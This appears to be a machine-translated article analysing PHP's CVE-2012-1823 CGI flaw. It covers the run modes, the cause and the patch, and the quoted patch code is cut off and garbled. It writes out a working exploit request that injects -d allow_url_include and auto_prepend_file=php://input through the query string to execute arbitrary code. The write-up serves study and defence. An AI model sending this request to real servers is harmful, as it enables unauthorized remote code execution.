Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to analyze the vulnerabilities of CVE-2012-1823. Many people may not know much about it. In order to make you understand better, the editor has summarized the following contents for you. I hope you can get something according to this article.

1. Four operating modes of PHP (what you need to know)

(1) CGI

The full name is "Universal Gateway Interface" (Common Gateway Interface), which allows a client to request data from a web browser to a program executed on a Web server, describing a standard for transferring data between the client and the program. In addition, CGI is independent of any language, so it can be written in any language, as long as the language has standard input, output and environment variables. Such as php,perl,tcl, etc.

CGI runs separate child processes for each user request to maintain, so performance problems occur when there are a large number of them, which have been rarely used in recent years.

(2) FastCGI

In the upgraded version of CGI, FastCGI is like a resident (long-live) CGI, which can be executed all the time, as long as it does not take time to parse php.ini, reload all dll extensions, and reinitialize all data structures every time after activation.

PHP is managed using PHP-FPM (FastCGI Process Manager), the full name PHP FastCGI process Manager.

(3) Cli

PHP-CLI is the abbreviation of PHP Command Line Interface, which is the interface that PHP runs on the command line, which is different from the PHP environment (PHP-CGI, etc.) running on the Web server.

In php-cli mode, we can directly start a php file and execute it, just like in workerman

(4) Module loading

This approach is generally targeted at apache, which runs php as a submodule of apache.

two。 Get to the point (1) the scope of impact of vulnerabilities

Vulnerability affects version php < 5.3.12 or php < 5.4.2

CVE-2012-1823 is a vulnerability in php-cgi running mode, which only occurs in php running in cgi mode.

(2) causes of loopholes

To put it simply, the querystring requested by the user (querystring literally means query string, usually parses the data contained in the http request, and here is only the data in the http request) is used as a parameter of the php-cgi, resulting in a series of results.

RFC3875 specifies that when the querystring does not contain an undecoded = sign, querystring is passed in as an argument to the cgi. So the Apache server implements this function as required. However, PHP does not notice this rule of RFC and may have noticed and handled it. The way to deal with it is that parameters are not allowed in the context of web. However, in order to make it easier for developers to test with a method similar to #! / usr/local/bin/php-cgi-d include_path=/path, they believe that php-cgi should not be restricted from accepting command-line arguments, and that this feature does not conflict with other code.

Therefore, the if (! cgi) getopt (...) in the source program It's been deleted.

According to the description of command line in RFC, command-line parameters can be passed not only through #! / usr/local/bin/php-cgi-d include_path=/path, but also through querystring.

(3) vulnerability exploitation

The following controllable command line parameters are available in cgi mode:

-c specifies the location of the php.ini file (the configuration file for PHP)

-n do not load the php.ini file

-d specify configuration item

-b start the fastcgi process

-s displays the file source code

-T executes the file for the specified time

-h and -? Show help

Then the easiest way to use it is that-s can directly display the source code (here is the environment built by yourself):

A better way to exploit this is to create arbitrary file inclusion vulnerabilities and execute arbitrary code by using-d to specify auto_prepend_file:

The principle is: use the controllable command line parameter-d to set the value of allow_url_include to on and use the auto_prepend_file function to load the file at the top of the page, while the loaded file is the original POST data read by php://input (that is, the execution result of the transferred data) and passed to the response package. ("+" is used instead of "space", and "=" and ":" are URL encoded.) the construction request header is as follows:

POST / index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1

Host: 127.0.0.1:8080

User-Agent: Mozilla/5.0 (X11; Linux x8634; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Length: 30

The result of the construction execution in burp is as follows:

(4) vulnerability repair

The repair principle is: get the querystring and decode it, first skip all white space characters (all characters less than or equal to spaces), and then determine whether the first character is -. If the first character is -, set skip_getopt, that is, do not get command line arguments. The repair source code is as follows

If ((query_string = getenv ("QUERY_STRING"))! = NULL & & strchr (query_string,'=') = = NULL) {

/ * we've got query string that has no =-apache CGI will pass it to command line * /

Unsigned char * p

Decoded_query_string = strdup (query_string)

Php_url_decode (decoded_query_string, strlen (decoded_query_string))

For (p = decoded_query_string; * p & & * p

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.